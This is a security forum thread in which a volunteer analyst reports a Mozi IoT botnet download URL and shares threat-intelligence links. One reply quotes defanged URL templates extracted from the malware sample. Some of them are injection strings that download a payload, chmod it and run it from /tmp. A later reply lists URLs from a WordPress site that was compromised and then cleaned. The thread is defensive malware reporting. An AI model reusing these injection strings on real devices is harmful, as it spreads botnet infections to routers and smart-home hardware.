Author Topic: Only one to report this malware download?  (Read 470 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33194
  • malware fighter
Only one to report this malware download?
« on: May 09, 2021, 01:48:15 PM »
See: https://urlhaus.abuse.ch/url/1212440/
One to report: https://www.virustotal.com/gui/ip-address/101.180.105.163/detection
Now also reported here: https://ip-46.com/101.180.105.163#ip-feeds

Mozi has been designed to specifically to attack low-power smart devices. Once installed, the malware tries to make contact with other infected devices, adding itself to the Mozi botnet. Once registered, the infected device continues toAccording to the report, the Mozi botnet malware targets devices that use MIPS and ARM processors – both of which are very common in low-power smart home hardware. Also infects wireless routers.

DHT node on various addresses: https://www.shodan.io/search?query=101.180.105.163

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)

Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33194
  • malware fighter
Re: Only one to report this malware download?
« Reply #1 on: May 10, 2021, 12:23:30 AM »
Here the malcode uri's workings are being confirmed through means of working an URL extractor onto it:
Quote
-http://%s:%d
-http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
-http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
-http://%s:%d/Mozi.a;sh
-http://%s:%d/Mozi.m
-http://%s:%d/Mozi.m+-O+-
-http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
-http://%s:%d/Mozi.m;/tmp/Mozi.m
-http://%s:%d/bin.sh
-http://%s:%d/bin.sh;chmod
-http://%s:%d/i
-http://%s:%d/i;chmod
-http://127.0.0.1
-http://baidu.com/%s/%s/%d/%s/%s/%s/%s) kicking up a search error
-http://ipinfo.io/ip
-http://purenetworks.com/HNAP1/
-http://schemas.xmlsoap.org/soap/encoding/
-http://schemas.xmlsoap.org/soap/envelope/
-http://schemas.xmlsoap.org/soap/envelope//
-http://www.w3.org/2001/XMLSchema
-http://www.w3.org/2001/XMLSchema-instance
all links blocked by me with - for obvious reasons.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33194
  • malware fighter
Re: Only one to report this malware download?
« Reply #2 on: May 10, 2021, 03:45:16 PM »
And some attackers use UPX as a compressor of malware to bypass detection*:

Quote
-http://%s?o??:%d/Mo?.m+-O
-http://upx.sf.net  *
GET /-Mo?.m+-O HTTP/1.0
Host: -%s?o??:%d
User-Agent: Malzilla original browser
Referer: -http://%s?o??:%d/Mo?.m+-O
Accept-Encoding: gzip
Normally one should get a 400 Bad Request,

polonus
« Last Edit: May 10, 2021, 03:47:00 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33194
  • malware fighter
Re: Only one to report this malware download?
« Reply #3 on: May 10, 2021, 07:46:29 PM »
Here the initial malware has been cleansed apparently:
Reported -> https://urlhaus.abuse.ch/url/1217299/
Scanned for: https://sitecheck.sucuri.net/results/https/salvajeglamping.com/wp-content/js_composer_/include/params/animation_style/HMYopU9fek
Extracted were:
Quote
-http://gmpg.org/xfn/11
-https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js
-https://api.w.org/
-https://cdnjs.cloudflare.com/ajax/libs/simple-line-icons/2.4.1/css/simple-line-icons.css
-https://engine.lobbypms.com/salvaje-glamping
-https://fonts.googleapis.com/css?family=Roboto:400
-https://maps.googleapis.com/maps/api/js?key=AIzaSyAox3dhEE18KtzKyecJ4iKBxr_oMosAa1g&language=en
-https://salvajeglamping.com
-https://salvajeglamping.com-content/uploads/2019/09/recargate-de-energia.jpg?id=235)
-https://salvajeglamping.com/
-https://salvajeglamping.com/author/salvaje/
-https://salvajeglamping.com/bioseguridad/
-https://salvajeglamping.com/comments/feed/
-https://salvajeglamping.com/conoce-mas/
-https://salvajeglamping.com/contactenos/
-https://salvajeglamping.com/feed/
-https://salvajeglamping.com/glamping-y-tarifas/
-https://salvajeglamping.com/terminos-y-condiciones/
-https://salvajeglamping.com/ubicacion/
-https://salvajeglamping.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.3.2
-https://salvajeglamping.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.3.2
-https://salvajeglamping.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.2.0
-https://salvajeglamping.com/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=6.2.0
-https://salvajeglamping.com/wp-content/plugins/js_composer/assets/lib/bower/skrollr/dist/skrollr.min.js?ver=6.2.0
-https://salvajeglamping.com/wp-content/plugins/porto-functionality/shortcodes/assets/js/map-loader.min.js?ver=5.6.3
-https://salvajeglamping.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.2.15
-https://salvajeglamping.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.2.15
-https://salvajeglamping.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.2.15
-https://salvajeglamping.com/wp-content/themes/porto-child/style.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/bootstrap_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/dynamic_style_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/ie.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/plugins.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/shortcodes_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/skin_1.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/css/theme.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/themes/porto/js/bootstrap.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/js/html5shiv.min.js
-https://salvajeglamping.com/wp-content/themes/porto/js/plugins.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/js/popper.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/js/respond.min.js
-https://salvajeglamping.com/wp-content/themes/porto/js/theme.js?ver=4.7.2
-https://salvajeglamping.com/wp-content/themes/porto/style.css?ver=5.6.3
-https://salvajeglamping.com/wp-content/uploads/2016/09/pin.png
-https://salvajeglamping.com/wp-content/uploads/2019/10/IMG_9823.jpg
-https://salvajeglamping.com/wp-content/uploads/2019/10/leaves-2.jpg
-https://salvajeglamping.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6.3
-https://salvajeglamping.com/wp-includes/js/comment-reply.min.js?ver=5.6.3
-https://salvajeglamping.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
-https://salvajeglamping.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
-https://salvajeglamping.com/wp-includes/js/wp-embed.min.js?ver=5.6.3
-https://salvajeglamping.com/wp-includes/wlwmanifest.xml
-https://salvajeglamping.com/wp-json/
-https://salvajeglamping.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsalvajeglamping.com%2F
-https://salvajeglamping.com/wp-json/oembed/1.0/embed?url
-https%3A%2F%2Fsalvajeglamping.com%2F&format=xml
-https://salvajeglamping.com/wp-json/wp/v2/pages/143
-https://salvajeglamping.com/wp/conoce-mas/
-https://salvajeglamping.com/wp/wp-content/uploads/2019/10/logo-salvaje-white.png
-https://salvajeglamping.com/xmlrpc.php
-https://salvajeglamping.com/xmlrpc.php?rsd
-https://wa.me/3006382616
-https://wa.me/3012159543
-https://www.facebook.com/SalvajeGlamping/
-https://www.instagram.com/salvajeglamping/
-https://youtu.be/DnoFXMfAyGI

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!